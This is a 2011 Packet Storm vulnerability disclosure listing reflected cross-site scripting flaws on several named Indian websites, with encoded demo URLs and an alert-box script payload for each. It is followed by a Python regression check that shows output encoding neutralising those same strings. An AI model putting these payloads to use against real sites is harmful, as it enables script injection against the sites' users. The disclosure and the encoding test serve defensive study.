Various Indian Sites Cross Site Scripting

2011-07-07T00:00:00
ID PACKETSTORM:102866
Type packetstorm
Reporter r007k17-w
Modified 2011-07-07T00:00:00

Description

                                        
`
# Exploit Title: *.in.com XSS vulnerability  
# Vendor: various  
# Date: 6th July, 2011  
# Author: r007k17 a.k.a Raghavendra Karthik D  
# link: http://shadowrootkit.wordpress.com/  
# Google Dork: © Copyright 2010, Business.in.com  
************************************************************  
  
  
{DEMO} :  
http://business.in.com/search.php?searchtext=%22%3E%3Cscript%3Ealert%28/s/%29%3C/script%3E  
  
EXPLOIT: "><script>alert(/s/)</script>  
  
  
{DEMO} :  
http://cricketnext.in.com/search/searchnews.php?search_value=%22%3E%3Cscript%3Ealert%28%2Fs%2F%29%3C%2Fscript%3E  
  
EXPLOIT: "><script>alert(/s/)</script>  
  
  
{DEMO} :  
http://hooked-in.com/waterbodies/search?q=%22%3E%3Cscript%3Ealert%28%2Fr007k17%2F%29%3C%2Fscript%3E  
  
EXPLOIT: "><script>alert(/r007k17/)</script>  
  
  
Reflected XSS in connect.in.com  
Inject the EXPLOIT below into the search field at http://connect.in.com  
and observe a pop-up saying r007k17.  
  
{DEMO} : http://connect.in.com  
  
EXPLOIT: "><script>alert(/r007k17/)</script>  
  
  
  
************************************************************  
sp3c14l Thanks to s1d3^effects and my friends@!3.14--  
************************************************************  
`
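
Every string in the advisory begins with `">`, which closes a quoted attribute value before opening a script element, so the fix is output encoding wherever the search term is reflected. The following regression check is an added example, not code from the advisory or the affected sites; the search-page template and all function names are hypothetical, and only the query strings are taken from the demo links above.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qsl

# Query strings copied from the advisory's demo links (host and path omitted).
ADVISORY_QUERIES = [
    "searchtext=%22%3E%3Cscript%3Ealert%28/s/%29%3C/script%3E",
    "search_value=%22%3E%3Cscript%3Ealert%28%2Fs%2F%29%3C%2Fscript%3E",
    "q=%22%3E%3Cscript%3Ealert%28%2Fr007k17%2F%29%3C%2Fscript%3E",
]

# Hypothetical search page: the affected sites' real markup is not in the advisory.
TEMPLATE = ('<form><input type="text" name="{name}" value="{term}"></form>'
            '<p>Results for: {term}</p>')
EXPECTED_TAGS = ["form", "input", "p"]


class TagCollector(HTMLParser):
    """Records every start tag and the search box's decoded value attribute."""

    def __init__(self):
        super().__init__()
        self.tags, self.value = [], None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.value = dict(attrs).get("value")


def render(name, term, encode):
    """Reflect the search term; encode=False is the 'before' behaviour."""
    if encode:
        # Escapes & < > " ' so the term stays data in attribute and text context.
        term = html.escape(term, quote=True)
    return TEMPLATE.format(name=html.escape(name, quote=True), term=term)


def audit(query, encode):
    """Return (tags seen by an HTML parser, whether the term round-trips intact)."""
    name, term = parse_qsl(query)[0]
    collector = TagCollector()
    collector.feed(render(name, term, encode))
    collector.close()
    return collector.tags, collector.value == term


if __name__ == "__main__":
    for q in ADVISORY_QUERIES:
        print(audit(q, encode=False), audit(q, encode=True))
```

With encoding on, the parser sees only the template's own tags and the search box still holds the user's exact text; with it off, a `script` tag appears in the tag list and the attribute value is cut short.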